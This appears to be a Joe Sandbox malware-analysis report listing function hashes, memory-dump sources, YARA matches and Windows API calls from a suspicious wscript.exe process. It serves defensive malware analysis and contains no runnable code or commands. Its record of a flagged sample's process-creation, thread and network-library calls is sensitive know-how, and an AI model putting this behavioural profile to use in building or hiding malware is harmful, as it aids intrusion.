                                                                                                          • Opcode Fuzzy Hash: f49779acb9f8571defdf522b6dcad181f6b930d973a21ec2e0f52afca32d4de2
                                                                                                          • Instruction Fuzzy Hash: 6E900229211500032105F558070850700DA8BD6356355C031F101E550CD621D9616121
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 7706dfb10c37ab668e8ab13c3916c9410b0d3e8ddc7029bb261159622eccd8f2
                                                                                                          • Instruction ID: 4ea940ed3bf7aa0802d8bc6d1361f31e464b87730cdbd9c18c9ce0d08a9a8277
                                                                                                          • Opcode Fuzzy Hash: 7706dfb10c37ab668e8ab13c3916c9410b0d3e8ddc7029bb261159622eccd8f2
                                                                                                          • Instruction Fuzzy Hash: A0900229221500022145F558060850B04D99BD7356395C025F141F590CC621D9656321
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: d6fe3b8ad5f6842cc944f6667b82e96ddcd3fbd2c7e6b358efd17add6bfb94f3
                                                                                                          • Instruction ID: bf8d56e5a48780fc276ac3b4e8890e72213f1e8cd8459b922a663964e8b5fe33
                                                                                                          • Opcode Fuzzy Hash: d6fe3b8ad5f6842cc944f6667b82e96ddcd3fbd2c7e6b358efd17add6bfb94f3
                                                                                                          • Instruction Fuzzy Hash: E190023560550802F150B158441874600998BD1306F55C021B002D654D8755DB5576A1
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: f73e88692c071c40ccf8e209cc945eaea87f61d9e0d9352f14024afc5d9f22b9
                                                                                                          • Instruction ID: f3b4cfe42fe593dd02e0d21db49cfe3a2b1bb8162ec11492a5197e08d0d409ce
                                                                                                          • Opcode Fuzzy Hash: f73e88692c071c40ccf8e209cc945eaea87f61d9e0d9352f14024afc5d9f22b9
                                                                                                          • Instruction Fuzzy Hash: 8490023520150802F180B158440864A00998BD2306F95C025B002E654DCA15DB5977A1
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 34af614127c6e765d745dbbcf0312225a4ea1a3ca45ef4e91e522eddbf650f1e
                                                                                                          • Instruction ID: f328707171a0b13ed6f1cfb786cdf0d24423207dd62f5960e1de45173e15f379
                                                                                                          • Opcode Fuzzy Hash: 34af614127c6e765d745dbbcf0312225a4ea1a3ca45ef4e91e522eddbf650f1e
                                                                                                          • Instruction Fuzzy Hash: 0E90023520554842F140B1584408A4600A98BD130AF55C021B006D694D9625DE55B661
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 745015c82b38945b0c543a2d1f7e5c1d94fb334cf50412d16bb753cc398ac534
                                                                                                          • Instruction ID: 90b67fc3f81dc1662abd4ec666e29b1d0feca50b61a482225eaf67e709d0e88f
                                                                                                          • Opcode Fuzzy Hash: 745015c82b38945b0c543a2d1f7e5c1d94fb334cf50412d16bb753cc398ac534
                                                                                                          • Instruction Fuzzy Hash: E3900265202500036105B1584418616409E8BE1206B55C031F101D590DC525D9917125
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 5a69a2cb7cfc68cf02ffcf726f6314516f467fc0d5d853e2cc74ac2df1f8be99
                                                                                                          • Instruction ID: 1e02c20a5a9b4611bbb88f2d5404566f0f3a00e754b2012a9275ca5bef1e98f6
                                                                                                          • Opcode Fuzzy Hash: 5a69a2cb7cfc68cf02ffcf726f6314516f467fc0d5d853e2cc74ac2df1f8be99
                                                                                                          • Instruction Fuzzy Hash: CD90023560560402F100B158451870610998BD1206F65C421B042D568D8795DA5175A2
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: be1a80fcaa42b92b21bb0ae27d2f16d1948b80f3739db6d2b2a7a0b7721d0e2d
                                                                                                          • Instruction ID: 0e82043fb4f8e136a852e90bd99a0e9ffe9a13b303de732b5c755af715491023
                                                                                                          • Opcode Fuzzy Hash: be1a80fcaa42b92b21bb0ae27d2f16d1948b80f3739db6d2b2a7a0b7721d0e2d
                                                                                                          • Instruction Fuzzy Hash: FA90022524555102F150B15C44086164099ABE1206F55C031B081D594D8555D9557221
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: InitializeUninitialize
                                                                                                          • String ID: @J7<
                                                                                                          • API String ID: 3442037557-2016760708
                                                                                                          • Opcode ID: 07dc37aed40d42fde5e40e0e6d38a626abe37d2bb44dd8bc649eeb820b13b265
                                                                                                          • Instruction ID: d87644ef60684c2db91efcee5bceaa9c2a09237d8eef7c64db164329ac07ccc0
                                                                                                          • Opcode Fuzzy Hash: 07dc37aed40d42fde5e40e0e6d38a626abe37d2bb44dd8bc649eeb820b13b265
                                                                                                          • Instruction Fuzzy Hash: E73134B5A0060A9FDB10DFD8D8809EFB7B9FF88304B108569E916E7214D775EE45CBA0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: InitializeUninitialize
                                                                                                          • String ID: @J7<
                                                                                                          • API String ID: 3442037557-2016760708
                                                                                                          • Opcode ID: e8a5296b95f409f54c070a06c7eda8feffda0ac5e598b798517ff85c947b1cdf
                                                                                                          • Instruction ID: 9ad5a1dd05c5c80e185f5631c70dfbc27be9987fea9c60dbfa359ce6594cb810
                                                                                                          • Opcode Fuzzy Hash: e8a5296b95f409f54c070a06c7eda8feffda0ac5e598b798517ff85c947b1cdf
                                                                                                          • Instruction Fuzzy Hash: AF3112B5A0060A9FDB10DFD8D8809EFB7B9FF88304B108569E916E7214D775EE45CBA0
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00779A8C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID: A4v
                                                                                                          • API String ID: 3298025750-2354387227
                                                                                                          • Opcode ID: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                          • Instruction ID: 2daaa753838e1f721c1043f329feceb4fbb0ff850aeebc18863bd9bfa4839197
                                                                                                          • Opcode Fuzzy Hash: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                          • Instruction Fuzzy Hash: F7E06D75200204BBDA10EE58DC49FDB73ACEFC9711F004018FA08A7242DA70B9118BB4
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00773D4B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID: wininet.dll
                                                                                                          • API String ID: 3472027048-3354682871
                                                                                                          • Opcode ID: 700bccd0693fc6de2cb298a2d104f14b142d86285ec905ff9060625a6a4abde7
                                                                                                          • Instruction ID: b8c0743317cc1a05c56cfdc031e68753f4c605d7db3bd8a0fa1b7cecb941ebbb
                                                                                                          • Opcode Fuzzy Hash: 700bccd0693fc6de2cb298a2d104f14b142d86285ec905ff9060625a6a4abde7
                                                                                                          • Instruction Fuzzy Hash: 80318BB1600605BBDB24DFA4CC84FEBBBB9BB88740F14811CF91D6B241C3746A50CBA1
                                                                                                          APIs
                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00764762
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Load
                                                                                                          • String ID:
                                                                                                          • API String ID: 2234796835-0
                                                                                                          • Opcode ID: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                          • Instruction ID: f2113aa0a26f630fc6d215c3e2b1c3d31b9f65e318217561af0a2e60fa5001f2
                                                                                                          • Opcode Fuzzy Hash: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                          • Instruction Fuzzy Hash: 62011EB5E0020DBBDF10EAA4DC46F9DB3789B54748F108195EE0D97241F675EB148B91
                                                                                                          APIs
                                                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,007684BE,00000010,?,?,?,00000044,?,00000010,007684BE,?,?,?), ref: 00779B40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateInternalProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2186235152-0
                                                                                                          APIs
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759F05
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2422867632-0
                                                                                                          APIs
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759F05
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2422867632-0
                                                                                                          APIs
                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 00778630
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Path$NameName_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3514427675-0
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00761BB9,?,?,00761BB9,^Xw,?,?,00761BB9,^Xw,00001000,?,?,00000000), ref: 00779A3C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 0076852C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 0076852C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00761EC0,0077819F,^Xw,00761E83), ref: 00768323
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(?,00000111), ref: 00760F97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1836367815-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590790163.00000000047B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_47b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590790163.00000000047B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_47b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                          • API String ID: 0-3754132690
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          • Opcode ID: f28c12b15afd84aef9c9bbad56f3a6fdd6eac3422518980eeb0ca7ec4d8c84e7
                                                                                                          • Instruction ID: 48778da9d6cd04abfcd3a6c27a3faeef60440f379c1936d6f21ca3448fe5ed88
                                                                                                          • Opcode Fuzzy Hash: f28c12b15afd84aef9c9bbad56f3a6fdd6eac3422518980eeb0ca7ec4d8c84e7
                                                                                                          • Instruction Fuzzy Hash: 6651E171A00645BBDF20DF9DC89097EB7FDAB48204B048CB9E496D7641EA74FE408B61
                                                                                                          Strings
                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04954787
                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04954655
                                                                                                          • Execute=1, xrefs: 04954713
                                                                                                          • ExecuteOptions, xrefs: 049546A0
                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049546FC
                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04954725
                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04954742
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                          • API String ID: 0-484625025
                                                                                                          • Opcode ID: 327ff898aacd76b518324f80ffb74c0fc90634ea92965205118f10e297db355e
                                                                                                          • Instruction ID: 6ce71fb0d815bc915bacb8a67dc02c5e7d9c748bb29c782275b020beccf21e0e
                                                                                                          • Opcode Fuzzy Hash: 327ff898aacd76b518324f80ffb74c0fc90634ea92965205118f10e297db355e
                                                                                                          • Instruction Fuzzy Hash: AD511631A0021E7AEF10EAA4EC89FA977ADEF84344F1405F9E505A71A1EB71BE41CF51
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-$0$0
                                                                                                          • API String ID: 1302938615-699404926
                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                          • Instruction ID: c4540fbd2a4391a2467f9eb60f014ce33e586bf20a01973146d3ca4802c8ec1e
                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                          • Instruction Fuzzy Hash: 1F81E330E052699FDF24CE68CA507FEBBFAAF85320F184539D865A7699C734B940CB50
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                          • API String ID: 48624451-2819853543
                                                                                                          • Opcode ID: 35a38a460dd5e34d7eb47807e43de5b97845b8c51e4a5e7990f7e6c4a8560346
                                                                                                          • Instruction ID: a2c56c90abc04862f95df46a2d8525515cb57f7ad861c954e1be607e013fa6d1
                                                                                                          • Opcode Fuzzy Hash: 35a38a460dd5e34d7eb47807e43de5b97845b8c51e4a5e7990f7e6c4a8560346
                                                                                                          • Instruction Fuzzy Hash: B7215176E00119ABDB20DFA9D840EEEBBECEF44754F140576E905E3204E730E9118BA1
                                                                                                          Strings
                                                                                                          • RTL: Re-Waiting, xrefs: 0495031E
                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049502E7
                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049502BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
